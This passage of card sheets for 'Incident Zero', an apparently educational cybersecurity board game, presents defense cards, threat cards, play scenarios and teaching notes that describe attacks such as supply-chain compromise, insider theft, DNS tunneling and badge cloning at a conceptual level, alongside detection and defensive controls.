│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in    │
│ isolated environments. Generate     │
│ behavioral indicators and YARA      │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware.   │
└─────────────────────────────────────┘

Card D-20: Zero Trust Access Control

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL           │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement zero-trust architecture:  │
│ verify every access request         │
│ regardless of source. Deploy device │
│ identity, user identity, and        │
│ behavior analytics. Implement       │
│ conditional access policies.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Eliminates implicit trust based on  │
│ network location. Even compromised  │
│ devices cannot access sensitive     │
│ resources without proper            │
│ authentication and behavior         │
│ validation.                         │
└─────────────────────────────────────┘

Card D-21: Container Security & Orchestration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy container runtime security   │
│ (Falco, Sysdig). Implement image    │
│ scanning for vulnerabilities. Use   │
│ policy enforcement engines (OPA/    │
│ Gatekeeper). Implement network      │
│ policies for container              │
│ segmentation.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects container escape attempts.  │
│ Prevents vulnerable images from     │
│ running. Limits lateral movement    │
│ within containerized environments.  │
│ Critical for modern cloud           │
│ applications.                       │
└─────────────────────────────────────┘

Card D-22: Security Information & Event Management (SIEM)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM)   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise SIEM (Splunk,     │
│ ELK, QRadar). Centralize logs from  │
│ all sources. Implement automated    │
│ correlation rules, threat           │
│ intelligence integration, and       │
│ incident response workflows.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides centralized visibility     │
│ into all security events. Enables   │
│ rapid threat detection and          │
│ investigation. Foundation for a     │
│ mature incident response program.   │
└─────────────────────────────────────┘

Sample Printable Card Layouts

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability
  4. For color printing: Use the color-coded vectors (red for MALWARE, blue for CREDENTIAL ABUSE, etc.)

Recommended Colors for Vectors


Card Deck Summary

Threat Cards (12 Total)

Defense Cards (24 Total)

Distribution by Countermeasure (v2.2): - SOCIAL ENGINEERING: 2 defenses (D-01, D-02) - WEB EXPLOIT: 2 defenses (D-03, D-18) - CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20) - MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21) - NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24) - DATA EXFIL: 2 defenses (D-11, D-24)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.


Suggested Play Scenarios

Scenario 1: Startup Security Breach (3-card chain - Beginner)

  1. Phishing Campaign → Deploy Email Authentication or User Training
  2. Mimikatz Credential Dumping → Deploy MFA or Credential Guard
  3. Data Exfiltration via Browser Extension → Deploy DLP or Threat Hunting

Scenario 2: SMB Lateral Movement (4-card chain - Intermediate)

  1. Compromised Credentials → Deploy MFA
  2. Lateral Movement via SMB → Deploy Network Segmentation
  3. Privilege Escalation → Deploy EDR or Threat Hunting
  4. Beaconing to C2 → Deploy Firewall Rules or IPS

Scenario 3: Advanced Ransomware Campaign (5-card chain - Expert)

  1. Watering Hole Attack → Deploy Patching or IPS
  2. Privilege Escalation via Kernel Exploit → Deploy EDR
  3. Scheduled Task Persistence → Deploy Memory Forensics
  4. Mimikatz Credential Dumping → Deploy Credential Guard
  5. Ransomware Deployment → Deploy DLP and Deception Technology

Expansion Decks

The ideas below have been built out as printable expansion cards:

Expansion Threat Cards (T-13 to T-20)

Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.

Expansion Defense Cards (D-25 to D-43)

Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.


Sample card sheets for Incident Zero board game For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md

cards/incident-response/expansion-deck/advanced-threats.md

Incident Zero: Expansion Threat Cards

Advanced Attack Scenarios & Additional Threats

This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.


ADDITIONAL THREAT CARDS (8 Cards)

Supply Chain Attack Threats

Card T-13: Compromised Software Vendor Update

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE  │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your monitoring systems detect     │
│ unusual outbound connections from   │
│ a recently deployed software update │
│ to an IP address not associated     │
│ with the vendor. The update was     │
│ digitally signed but verification   │
│ shows the signature was backdated.  │
│ Hundreds of organizations received  │
│ the same malicious update."         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Supply chain compromises affect     │
│ entire industries simultaneously.    │
│ Organizations trust vendor updates  │
│ and often deploy them automatically │
│ without deep inspection. The        │
│ attacker gains access to thousands  │
│ of targets at once. Real-world      │
│ example: SolarWinds, 3CX.           │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ The malware appears legitimate due  │
│ to trusted vendor origin.           │
└─────────────────────────────────────┘

Card T-14: Malicious Third-Party Library Injection

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY       │
│ INJECTION                           │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your dependency scanning tool      │
│ alerts on a typosquatted NPM        │
│ package (npm package manager) that  │
│ was installed in your build         │
│ pipeline. The malicious package has │
│ the same name as a popular logging  │
│ library but with a slight misspell. │
│ It has been downloaded 50k times.   │
│ Your build logs show it was         │
│ installed 6 days ago."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Developers rely on open-source      │
│ packages from package managers      │
│ (npm, PyPI, Maven). Attackers       │
│ upload malicious packages with      │
│ names similar to popular libraries  │
│ (typosquatting). Once downloaded,   │
│ the malicious code runs during      │
│ build/deployment. This affects      │
│ every application built from that   │
│ point forward.                      │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires dependency scanning and    │
│ behavior analysis of build processes.│
└─────────────────────────────────────┘

Insider Threat Cards

Card T-15: Malicious Insider Data Theft

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT        │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DLP system flags a large      │
│ volume of sensitive data being      │
│ copied by an IT operations          │
│ employee during off-hours. Their    │
│ user account accessed databases     │
│ they don't normally interact with.  │
│ The data was copied to a removable  │
│ USB drive connected to a shared     │
│ workstation. Security badge logs    │
│ show they entered the building at   │
│ 2 AM when the office was empty."    │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Insiders have legitimate access and │
│ often bypass security controls.     │
│ Their activities may not trigger    │
│ alerts because their permissions    │
│ are valid. Detection requires:      │
│ - Behavioral analysis (unusual      │
│  times/volumes)                     │
│ - Physical security controls        │
│ - DLP and USB device control        │
│ - Privileged access management      │
│ Insiders cause 30-40% of data      │
│ breaches in many industries.        │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Insider actions often look normal   │
│ to automated systems.               │
└─────────────────────────────────────┘

Card T-16: Disgruntled Employee Sabotage

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A recently terminated database     │
│ administrator appears to have       │
│ retained remote access using a      │
│ dormant service account they        │
│ created months ago. Logs show       │
│ connection attempts from their      │
│ home IP address. They've been       │
│ modifying stored procedures and     │
│ adding logic bombs set to trigger   │
│ in 30 days. Your team notices       │
│ their employee laptop is still      │
│ configured with VPN certificates."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Disgruntled employees often have    │
│ privileged access and deep system   │
│ knowledge. They may have created    │
│ backdoors before termination.       │
│ Offboarding failures (not revoking  │
│ certs, not disabling accounts) are  │
│ common. Defense requires:           │
│ - Complete offboarding procedures   │
│ - Privileged access review          │
│ - Anomalous activity detection      │
│ - Behavior analysis for terminated  │
│  employees                          │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires correlation of access      │
│ patterns and employee status changes.│
└─────────────────────────────────────┘

IoT Device Compromise

Card T-17: Compromised IoT Device as Pivot Point

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT     │
│ POINT                               │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your network monitoring detects    │
│ unusual traffic from an IoT device  │
│ (surveillance camera) in the        │
│ building. The device is communicating│
│ with a command server overseas and  │
│ tunneling internal network traffic. │
│ Your asset inventory shows this     │
│ camera was never formally added to  │
│ any security program. It's running  │
│ firmware from 2019 with known       │
│ vulnerabilities."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ IoT devices are often neglected in  │
│ security programs (cameras, printers,│
│ thermostats, building automation).  │
│ They run outdated firmware and have │
│ weak or default credentials. Once   │
│ compromised, they provide network   │
│ access and can pivot to critical    │
│ systems. Many organizations don't   │
│ inventory or monitor IoT devices.   │
│                                     │
│ DETECTION DIFFICULTY: Medium        │
│ Requires network monitoring and     │
│ device inventory practices.         │
└─────────────────────────────────────┘

Cloud API Abuse

Card T-18: Cloud API Token Theft & Abuse

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your AWS CloudTrail logs show API  │
│ calls from unusual IP addresses     │
│ using API keys belonging to a       │
│ developer who left the company 6    │
│ months ago. The calls are creating  │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching   │
│ EC2 instances in regions where you  │
│ don't normally operate. The API key │
│ was embedded in old GitHub          │
│ repository code."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Cloud API tokens/keys are often     │
│ exposed in code repositories or     │
│ configuration files. Once exposed,  │
│ they provide direct access to cloud │
│ resources. Attackers can spin up    │
│ resources, steal data, or deploy    │
│ cryptominers. Many organizations    │
│ fail to rotate or revoke old API    │
│ keys. Detection requires:           │
│ - API audit logging                 │
│ - Anomalous API pattern detection   │
│ - Key rotation policies             │
│ - Secrets scanning in repos         │
│                                     │
│ DETECTION DIFFICULTY: Medium-High   │
│ Requires cloud monitoring and       │
│ secrets management practices.       │
└─────────────────────────────────────┘

DNS Tunneling for Data Exfiltration

Card T-19: DNS Tunneling Data Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION     │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DNS query logs show massive   │
│ volume of unusual subdomains being  │
│ queried through an external DNS     │
│ resolver. The subdomain names look  │
│ like Base64-encoded data. Queries   │
│ are happening in steady intervals.  │
│ Query timestamps align with your    │
│ database being accessed. Your DLP   │
│ didn't flag anything because DNS is │
│ typically trusted."                 │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ DNS tunneling encodes data in DNS   │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow  │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume   │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks.         │
│ Defense requires:                   │
│ - DNS query content analysis        │
│ - Anomalous query pattern detection │
│ - DNS rate limiting                 │
│ - External DNS access restrictions  │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis.        │
└─────────────────────────────────────┘

Physical Security Bypass

Card T-20: Physical Access + Badge Cloning Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING     │
│ ATTACK                              │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team discovers that  │
│ an RFID badge belonging to a        │
│ manager was cloned using a portable │
│ reader. The cloned badge was used   │
│ to gain access to your secure data  │
│ center after-hours. Badge access    │
│ logs are timestamped, but the       │
│ person's schedule shows they weren't│
│ in the office that evening. Your    │
│ server room CCTV captured footage   │
│ of an unknown individual installing │
│ a wireless device in the network    │
│ rack."                              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Physical security is often          │
│ overlooked in cybersecurity         │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once      │
│ inside the data center, attackers   │
│ can install rogue network devices,  │
│ steal hardware, or gain console     │
│ access to servers. Defense requires:│
│ - Encrypted badge technology        │
│ - Multi-factor access (biometric)   │
│ - CCTV monitoring                   │
│ - Environmental controls            │
│ - Equipment inventory tracking      │
│ - Badge deactivation on exit        │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires integration of physical    │
│ and cyber security monitoring.      │
└─────────────────────────────────────┘

Integrating Expansion Threats into Your Game

Attack Vector Summary (Expansion Cards)

Suggested Scenario Combinations

Scenario 4: "Supply Chain Nightmare" (5-card chain - Expert)

Teaches: Third-party risk management, vendor security assessment, incident response at scale 1. Compromised Software Vendor Update (Initial Compromise) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Beaconing to C2 Server (C2 & Exfil) → NETWORK 5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL

Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).

Scenario 5: "Insider Threat Explosion" (4-card chain - Intermediate)

Teaches: Insider risk detection, privileged access management, offboarding procedures 1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE 4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).

Scenario 6: "Modern Infrastructure Attack" (5-card chain - Expert)

Teaches: IoT security, cloud security, API management, defense breadth 1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL

Parallel threat: Teams must defend against both cloud and on-premises infrastructure simultaneously.

Scenario 7: "Physical Meets Cyber" (4-card chain - Intermediate)

Teaches: Physical security integration, environmental controls, holistic security 1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE

Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."

Scenario 8: "Supply Chain + Insider Collusion" (5-card chain - Hard)

Teaches: Complex attack coordination, detecting collusion, multi-vector threats 1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE 2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL 5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). Incomplete investigation leads to missed detection of the insider component.


Recommended Defense Cards for Expansion Threats

(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.

For Supply Chain Attacks (T-13, T-14)

For Insider Threats (T-15, T-16)

For IoT Device Compromise (T-17)

For Cloud API Abuse (T-18)

For DNS Tunneling (T-19)

For Physical Security Bypass (T-20)


Difficulty Adjustments Using Expansion Cards

Easy + Expansion (6-card chain)

Medium + Expansion (4-5 card chains with expansion)

Hard + Expansion (5+ card chains with 2+ expansion cards)


Teaching Notes for Threat Orchestrators

Supply Chain Attacks (T-13, T-14)

Real-world context: - SolarWinds (2020) - 18,000+ organizations affected - 3CX (2023) - Trojanized build system - XcodeGhost (2015) - Compromised Xcode developer tool - Typosquatted packages discovered monthly on npm/PyPI

Discussion points after reveal: - "How do you verify software authenticity?" - "What's the difference between detecting supply chain compromises vs. traditional malware?" - "Why is this harder to detect than direct attacks?"

Insider Threats (T-15, T-16)

Real-world context: - ~30-40% of data breaches involve insiders (Verizon DBIR) - Manning, Snowden, Reality Winner cases (government sector) - Thousands of employee theft cases in financial/tech industries

Discussion points after reveal: - "How would you detect insider threat indicators before damage occurs?" - "Why is offboarding security often weak?" - "What's the difference between a malicious insider and negligent employee?"

IoT Device Compromise (T-17)

Real-world context: - Mirai botnet (2016) - Millions of compromised IoT devices - Connected cameras, printers, thermostats often neglected - "Shadow IT" problem in many organizations

Discussion points after reveal: - "Should IoT devices be on the same network as critical systems?" - "How do you patch thousands of IoT devices?" - "Why are credentials often factory-default on IoT?"

Cloud API Abuse (T-18)

Real-world context: - AWS credentials leaked in GitHub ~8 times per day (GitHub telemetry) - Tesla's Kubernetes cluster hacked via exposed credentials - Capital One breach involved compromised IAM role

Discussion points after reveal: - "How do you manage API keys for thousands of developers?" - "Why is secrets rotation hard in practice?" - "How would you know if someone used your AWS API key?"

DNS Tunneling (T-19)

Real-world context: - Used by DNS.Exfiltrator, OilRig APT, Turla malware families - Hard to detect because DNS is typically trusted - Can exfil ~20 KB/hour via subdomains

Discussion points after reveal: - "Why is DNS hard to monitor?" - "What would a normal DNS query pattern look like?" - "How would you distinguish data exfil from normal DNS activity?"

Physical Security Bypass (T-20)

Real-world context: - RFID cloning demonstrated on hotel keys, building badges - Rogue network devices found in data centers (Target breach had physical component) - USB drops with malware remain effective attack vectors

Discussion points after reveal: - "Should cybersecurity teams care about physical security?" - "How do you audit data center access?" - "What's harder to defend: cyber or physical attacks?"


Expansion Threat Card Deck Summary

Card Title Step Vector Difficulty
T-13 Compromised Software Vendor Update INITIAL MALWARE Hard
T-14 Malicious Third-Party Library Injection INITIAL MALWARE Medium
T-15 Malicious Insider Data Theft C2 & EXFIL DATA EXFIL Very Hard
T-16 Disgruntled Employee Sabotage PIVOT & ESCALATE MALWARE Hard
T-17 Compromised IoT Device as Pivot Point INITIAL NETWORK Medium
T-18 Cloud API Token Theft & Abuse PIVOT & ESCALATE CREDENTIAL ABUSE Hard
T-19 DNS Tunneling Data Exfiltration C2 & EXFIL DATA EXFIL Very Hard
T-20 Physical Access + Badge Cloning INITIAL CREDENTIAL ABUSE Hard

Quick Integration Checklist


Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections

cards/incident-response/expansion-deck/advanced-defenses.md

Incident Zero: Expansion Defense Cards

Advanced Security Controls & Defensive Capabilities

This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.

Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).


ADDITIONAL DEFENSE CARDS (19 Cards)

Application Whitelisting Defenses

Card D-25: Application Whitelisting (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy application whitelisting on  │
│ critical workstations and servers.  │
│ Maintain an approved applications   │
│ list (Word, Excel, Chrome, etc.).   │
│ Block execution of any unapproved   │
│ binaries. Use AppLocker (Windows)   │
│ or similar tools.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents execution of malware and   │
│ unauthorized tools. Attackers cannot│
│ run ransomware, backdoors, or       │
│ penetration tools if they're not on │
│ the whitelist. Effective against    │
│ zero-days if not signed by trusted  │
│ publishers.                         │
│                                     │
│ LIMITATION: False positives if      │
│ maintenance is poor. Users may      │
│ struggle with legitimate tools      │
│ being blocked.                      │
└─────────────────────────────────────┘

Card D-26: Advanced Application Control with AI

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy AI-powered application       │
│ control that learns normal program  │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious    │
│ or anomalous applications.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new  │
│ applications without manual updates.│
│ Catches polymorphic malware variants│
│ that might bypass static whitelisting│
│ (different packing, slight name     │
│ changes). Reduces false positives.  │
│                                     │
│ LEARNING CURVE: Requires baseline   │
│ training period (1-2 weeks).        │
└─────────────────────────────────────┘

Card D-27: Living-Off-The-Land Blocker (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER         │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced script and tool     │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and   │
│ other "living-off-the-land" tools.  │
│ Allow only specific, monitored usage│
│ with strong justification logging.  │
│ Monitor for obfuscation patterns.   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Directly targets attacker techniques│
│ used in privilege escalation and    │
│ lateral movement (scheduled tasks,  │
│ registry modification, credential   │
│ dumping). Makes PowerShell and cmd  │
│ attacks extremely difficult.        │
│ Works especially well with EDR.     │
│                                     │
│ IMPACT: May break legitimate admin  │
│ tasks; requires strong change       │
│ management.                         │
└─────────────────────────────────────┘

Behavioral Analytics Defenses

Card D-28: Baseline Behavior Learning System (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy behavioral analytics that    │
│ establishes baseline profiles for   │
│ users, systems, and network traffic.│
│ System learns what "normal" looks   │
│ like, then alerts on deviations.    │
│ Monitors: login times, file access, │
│ network destinations, resource usage.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects anomalies like:             │
│ - Unusual login geography/time      │
│ - Data access patterns changing     │
│ - Lateral movement via SMB          │
│ - New network destinations          │
│ Works best as a *combination* with  │
│ other tools. Requires good baseline  │
│ data (1-2 weeks of normal traffic). │
│                                     │
│ DETECTS: Insider threats,           │
│ compromised credentials, APT tactics.│
└─────────────────────────────────────┘

Card D-29: Process Behavior Analysis (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS           │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy process-level behavioral     │
│ monitoring that learns what each    │
│ application normally does (file I/O,│
│ network calls, registry access,     │
│ child processes spawned). Blocks    │
│ anomalous behavior from legitimate  │
│ binaries.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches:                            │
│ - Legitimate apps compromised by    │
│  supply chain attack                │
│ - Process injection attacks         │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes    │
│ Example: Word.exe normally doesn't  │
│ spawn PowerShell; if it does, block │
│ and alert.                          │
│                                     │
│ DETECTS: Zero-day malware, APT      │
│ techniques, supply chain compromises.│
└─────────────────────────────────────┘

Card D-30: Machine Learning Anomaly Detection (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy ML models trained on terabytes│
│ of security data. System detects    │
│ subtle anomalies humans would miss: │
│ subtle timing changes, rare resource│
│ combinations, statistical outliers. │
│ Continuously retrains on new data.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems.   │
│ Detects:                            │
│ - Polymorphic malware variations    │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior)   │
│ - Sophisticated insider threats     │
│ - Supply chain compromises          │
│                                     │
│ TRADE-OFF: False positives require  │
│ human analysis. Requires large      │
│ datasets for training.              │
└─────────────────────────────────────┘

Container Security Defenses

Card D-31: Container Image Scanning (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Scan all container images before    │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate   │
│ scanning into CI/CD pipeline.       │
│ Block images with critical CVEs     │
│ from being deployed.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents deployment of vulnerable   │
│ containers. Catches:                │
│ - Old base images with known CVEs   │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into   │
│ images                              │
│ Works best when combined with       │
│ runtime monitoring.                 │
│                                     │
│ LIMITATION: Only catches known      │
│ vulnerabilities (CVE databases).    │
└─────────────────────────────────────┘

Card D-32: Container Runtime Protection (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION        │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy runtime security monitoring  │
│ that enforces security policies on  │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor   │
│ or SELinux profiles.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects and blocks:                 │
│ - Container escape attempts         │
│ - Lateral movement between containers│
│ - Privilege escalation in container │
│ - Anomalous process execution       │
│ - Unexpected network connections    │
│ Works against both known and unknown│
│ attacks (zero-day exploits).        │
│                                     │
│ REQUIREMENT: Requires kernel-level  │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘

Card D-33: Kubernetes Network Policy & RBAC (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC    │
